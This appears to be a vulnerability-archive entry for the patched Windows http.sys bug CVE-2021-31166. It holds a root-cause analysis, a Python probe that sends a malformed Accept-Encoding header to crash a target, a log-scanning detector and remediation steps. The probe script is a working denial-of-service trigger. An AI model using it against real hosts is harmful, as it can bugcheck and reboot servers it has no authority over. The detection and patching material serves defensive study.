HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2021-31166)
by Axel "0vercl0k" Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1 · 2026-05-15
- Severity
- Critical
- CVE
- CVE-2021-31166
- Category
- network
- Affected product
- Microsoft Windows HTTP Protocol Stack (http.sys)
- Affected versions
- Windows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory
- Disclosed
- 2021-05-11 (Microsoft May 2021 security update release; 2026-05-15 is the archive ingestion date)
- Patch status
- patched
Archive entry
intelseclab/poc-archive
Metadata
| Field | Value |
|---|---|
| Date Added | 2026-05-15 |
| Author / Researcher | Axel “0vercl0k” Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1 |
| CVE / Advisory | CVE-2021-31166 |
| Category | network |
| Severity | Critical |
| CVSS Score | 9.8 (CVSSv3.1) |
| Status | Weaponized |
| Tags | HTTP.sys, use-after-free, RCE, Windows, kernel, unauthenticated |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Microsoft Windows HTTP Protocol Stack (http.sys) |
| Versions Affected | Windows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory |
| Language / Platform | Python PoC targeting Windows HTTP.sys over HTTP |
| Authentication Required | No |
| Network Access Required | Yes |
Summary
CVE-2021-31166 is a use-after-free in the Windows HTTP Protocol Stack (http.sys), the kernel-mode HTTP listener behind IIS and other Windows HTTP services, reachable by any client that can send it a request. The public PoC sends a single GET whose Accept-Encoding header contains malformed comma-separated codings, which exercises the faulty list handling in the kernel header parser. Microsoft rates the bug as unauthenticated remote code execution (CVSS 9.8); what the PoC itself demonstrates is the crash (a kernel bugcheck), and code execution is Microsoft's assessed impact, not something the PoC implements.
Vulnerability Details
Root Cause
http!UlpParseContentCoding collects the parsed content-coding entries on a local list head and, once parsing completes, moves that list into the request structure. The local list linkage is not invalidated after the move, so when the function subsequently takes an error path on a malformed element (an empty coding in the comma-separated list), the entries reachable through the stale local head are freed while the request still owns them. The result is a use-after-free / double free of the coding entries; the corrupted LIST_ENTRY is what the kernel's list-integrity check reports as KERNEL_SECURITY_CHECK_FAILURE.
Attack Vector
A remote, unauthenticated attacker sends one HTTP request whose Accept-Encoding value contains malformed comma-separated codings (empty elements, a trailing comma) to any Windows service that listens through http.sys; IIS is the common case. No session, credentials or prior interaction is needed, so the trigger travels in a single unsolicited request.
Impact
- Remote kernel crash/denial-of-service (bugcheck KERNEL_SECURITY_CHECK_FAILURE): the whole host reboots, not just the web service.
- Potential remote code execution in the Windows kernel networking stack.
- Exposure of internet-facing Windows services that rely on http.sys.
Environment / Lab Setup
OS: Attacker on Linux/macOS/Windows with Python 3
Target: Authorized vulnerable Windows 10/Windows Server host using HTTP.sys
Attacker: Any host with TCP connectivity to target HTTP service
Tools: python3, requests
Setup Steps
- Install Python 3 and the requests package on the attacker host (pip install requests).
- Provision an isolated Windows 10 2004/20H2 or Windows Server 2004/20H2 host at a build predating the May 2021 updates, with an http.sys-backed listener enabled (IIS, for example).
- Confirm TCP reachability to the listener from the attacker host before running the PoC; a successful trigger bugchecks and reboots the target, so keep it off production networks.
Proof of Concept
Step-by-Step Reproduction
- Prepare an authorized vulnerable Windows system exposing an HTTP endpoint backed by http.sys.
- From an attacker machine, run the PoC with --target <ip:port>.
- The PoC sends a GET request with a crafted Accept-Encoding header.
- Observe target instability/crash in vulnerable environments.
Exploit Code
See cve-2021-31166.py in this folder.
Expected Output
<Response [400]> is the requests Response object the script prints when the target answers (a host that rejects the header returns 400 Bad Request). That line alone does not prove vulnerability: on a vulnerable host the evidence is the bugcheck (KERNEL_SECURITY_CHECK_FAILURE) on the target, and the client may instead see a timeout or connection error once the host goes down.
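The request the reproduction steps describe, as an added example that is not the repository's cve-2021-31166.py: it serialises the GET with a malformed Accept-Encoding value as raw bytes (so no client library normalises the header) and reports which of three outcomes the target produced. The header literal is constructed from this page's description (unknown coding names followed by empty list elements and a trailing comma); the assumption that unknown codings are what land on the unknown-coding list named in the crash signature is mine, and the literal is not the repository's exact value. Run send_probe() only against a host you are authorized to crash.

```python
"""Added example (not the repository's cve-2021-31166.py): build the crafted
GET request as raw bytes and send it with a timeout so the three possible
outcomes are distinguishable. Run send_probe() only against an authorized lab host.
"""
import socket
from typing import Optional, Tuple

# Constructed value following the page's description: unknown (non-standard)
# coding names followed by empty list elements and a trailing comma. The exact
# literal used by the repository's script is not reproduced on this page.
MALFORMED_ACCEPT_ENCODING = "x-unknown-1, x-unknown-2, ,"


def build_request(host: str, path: str = "/",
                  accept_encoding: str = MALFORMED_ACCEPT_ENCODING) -> bytes:
    """Serialise a minimal HTTP/1.1 GET. Raw bytes guarantee the header reaches
    http.sys exactly as written instead of being normalised by a client library."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"Accept-Encoding: {accept_encoding}",
        "Connection: close",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def status_code(response: bytes) -> Optional[int]:
    """Extract the status code from the response status line, if there is one."""
    first_line = response.split(b"\r\n", 1)[0]
    parts = first_line.split(b" ")
    if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
        return int(parts[1])
    return None


def classify(response: Optional[bytes], timed_out: bool) -> str:
    """'responded' : the target answered (400 is the page's expected output);
    'timeout'   : nothing came back, consistent with the host bugchecking;
    'reset'     : the connection was refused or dropped without data."""
    if response:
        return "responded"
    return "timeout" if timed_out else "reset"


def send_probe(target: str, port: int = 80, timeout: float = 5.0) -> Tuple[str, Optional[int]]:
    """Send one crafted request; return (outcome, status code or None)."""
    request = build_request(target)
    response = b""
    timed_out = False
    try:
        with socket.create_connection((target, port), timeout=timeout) as sock:
            sock.sendall(request)
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                response += chunk
    except socket.timeout:          # must precede OSError: timeout is a subclass
        timed_out = True
    except OSError:
        pass                        # refused / reset: classified as 'reset'
    return classify(response, timed_out), (status_code(response) if response else None)


if __name__ == "__main__":
    import sys
    print(send_probe(sys.argv[1]))
```

Usage: python3 probe.py <target-ip>. An outcome of 'responded' with status 400 matches the page's expected output on a host that rejects the header; 'timeout' followed by the target rebooting is the crash case, and 'reset' usually means no http.sys listener on that port.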
Screenshots / Evidence
screenshots/ (placeholder): add authorized lab packet capture, request trace, and crash evidence (bugcheck screenshot or minidump).
Detection & Indicators of Compromise
- Repeated malformed Accept-Encoding headers such as empty or trailing codings (", ," or a value ending in a comma). Well-behaved clients do not emit these, but RFC 7230 section 7 requires recipients to tolerate a reasonable number of empty list elements, so treat the signal as a heuristic rather than a protocol violation.
- Sudden HTTP service disruption followed by host bugcheck/reboot; after restart the Windows System log records the stop code in Event ID 1001 (source BugCheck).
- Kernel crash signatures involving HTTP!UlFreeUnknownCodingList / UlpParseAcceptEncoding in the minidump or bugcheck analysis.
SIEM / IDS Rule (example):
Alert on inbound HTTP requests where Accept-Encoding contains malformed trailing commas or empty coding tokens, and correlate with HTTP service crashes. Capture the header at an edge device (reverse proxy, IDS) rather than relying on the target's own logs, since a host that bugchecks on the request may never log it.
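Detection logic for the indicators above, as an added example that is not part of the original page: it parses Accept-Encoding values with the RFC 7230 list rules, flags empty elements and non-token codings, scans request records, and narrows the hits to a window before a bugcheck timestamp. The JSON-lines log format, field names and IP addresses are constructed for the example and assume an edge device that records the raw header value.

```python
"""Added example (not from the original page): flag Accept-Encoding values whose
shape matches the CVE-2021-31166 trigger in request logs and correlate the hits
with a bugcheck time. The JSON-lines format and every record below are constructed.
"""
import json
import re
from datetime import datetime, timedelta
from typing import Dict, List

# RFC 7230 token characters: a content-coding name must be a token.
TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")
# Optional weight parameter, e.g. ";q=0.8".
WEIGHT = re.compile(r"^q=(0(\.[0-9]{0,3})?|1(\.0{0,3})?)$")
TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def analyse_accept_encoding(value: str) -> Dict[str, object]:
    """Split on commas as the RFC 7230 #list rule does and report empty list
    elements (", ," or a trailing comma) and non-token codings.
    Caveat: RFC 7230 section 7 lets recipients ignore a reasonable number of
    empty elements, so a hit is a heuristic on rare input, not a protocol
    violation; well-behaved clients simply never send them."""
    elements = [e.strip(" \t") for e in value.split(",")]
    empty = sum(1 for e in elements if e == "")
    bad: List[str] = []
    for element in elements:
        if element == "":
            continue
        coding, _, params = element.partition(";")
        if not TOKEN.match(coding.strip(" \t")):
            bad.append(element)
        elif params and not WEIGHT.match(params.strip(" \t")):
            bad.append(element)
    return {
        "empty_elements": empty,
        "trailing_comma": value.rstrip(" \t").endswith(","),
        "bad_elements": bad,
        "suspicious": empty > 0 or bool(bad),
    }


# Constructed edge-device log: one JSON object per request, raw header preserved.
SAMPLE_LOG = """\
{"ts": "2021-05-16T10:00:01Z", "client": "203.0.113.7", "accept_encoding": "gzip, deflate, br"}
{"ts": "2021-05-16T10:00:02Z", "client": "198.51.100.9", "accept_encoding": "gzip;q=1.0, identity;q=0.5"}
{"ts": "2021-05-16T10:00:03Z", "client": "203.0.113.7", "accept_encoding": "x-unknown-1, x-unknown-2, ,"}
{"ts": "2021-05-16T10:00:04Z", "client": "192.0.2.44", "accept_encoding": "gzip, not/a/token"}
{"ts": "2021-05-16T10:00:05Z", "client": "192.0.2.44", "accept_encoding": "*"}
"""


def scan(log_lines: str) -> List[Dict[str, object]]:
    """Return one hit per record whose Accept-Encoding looks suspicious."""
    hits: List[Dict[str, object]] = []
    for line in log_lines.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        verdict = analyse_accept_encoding(record.get("accept_encoding", ""))
        if verdict["suspicious"]:
            hits.append({"ts": record["ts"], "client": record["client"],
                         "accept_encoding": record["accept_encoding"], **verdict})
    return hits


def hits_before_crash(hits: List[Dict[str, object]], crash_ts: str,
                      window_seconds: int = 60) -> List[Dict[str, object]]:
    """Keep hits seen in the window before a host bugcheck (e.g. the time of the
    Event ID 1001 BugCheck record). Correlation must use the edge log: a request
    that bugchecks the host may never reach the target's own logs."""
    crash = datetime.strptime(crash_ts, TS_FORMAT)
    earliest = crash - timedelta(seconds=window_seconds)
    return [h for h in hits
            if earliest <= datetime.strptime(str(h["ts"]), TS_FORMAT) <= crash]


if __name__ == "__main__":
    for hit in hits_before_crash(scan(SAMPLE_LOG), "2021-05-16T10:00:30Z"):
        print(hit["ts"], hit["client"], repr(hit["accept_encoding"]), hit["bad_elements"])
```

The two checks serve different purposes: empty elements match the shape of the known trigger, while non-token codings catch clients fuzzing the same parser with other malformed lists. Tune window_seconds to the delay between the request and the crash record in your environment.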
Remediation
| Action | Detail |
|---|---|
| Patch | Apply Microsoft May 2021 security updates for CVE-2021-31166 |
| Workaround | Restrict exposure of HTTP.sys-backed services and filter malformed headers at edge controls |
| Config Hardening | Segment critical Windows hosts, enable crash monitoring, and maintain rapid patch cadence |
References
- CVE-2021-31166
- Microsoft Security Update Guide
- Source Repository — 0vercl0k/CVE-2021-31166
- Discovering and exploiting a use-after-free in HTTP Protocol Stack (tweet/thread reference from repository)
Notes
Auto-ingested from https://github.com/0vercl0k/CVE-2021-31166 on 2026-05-15.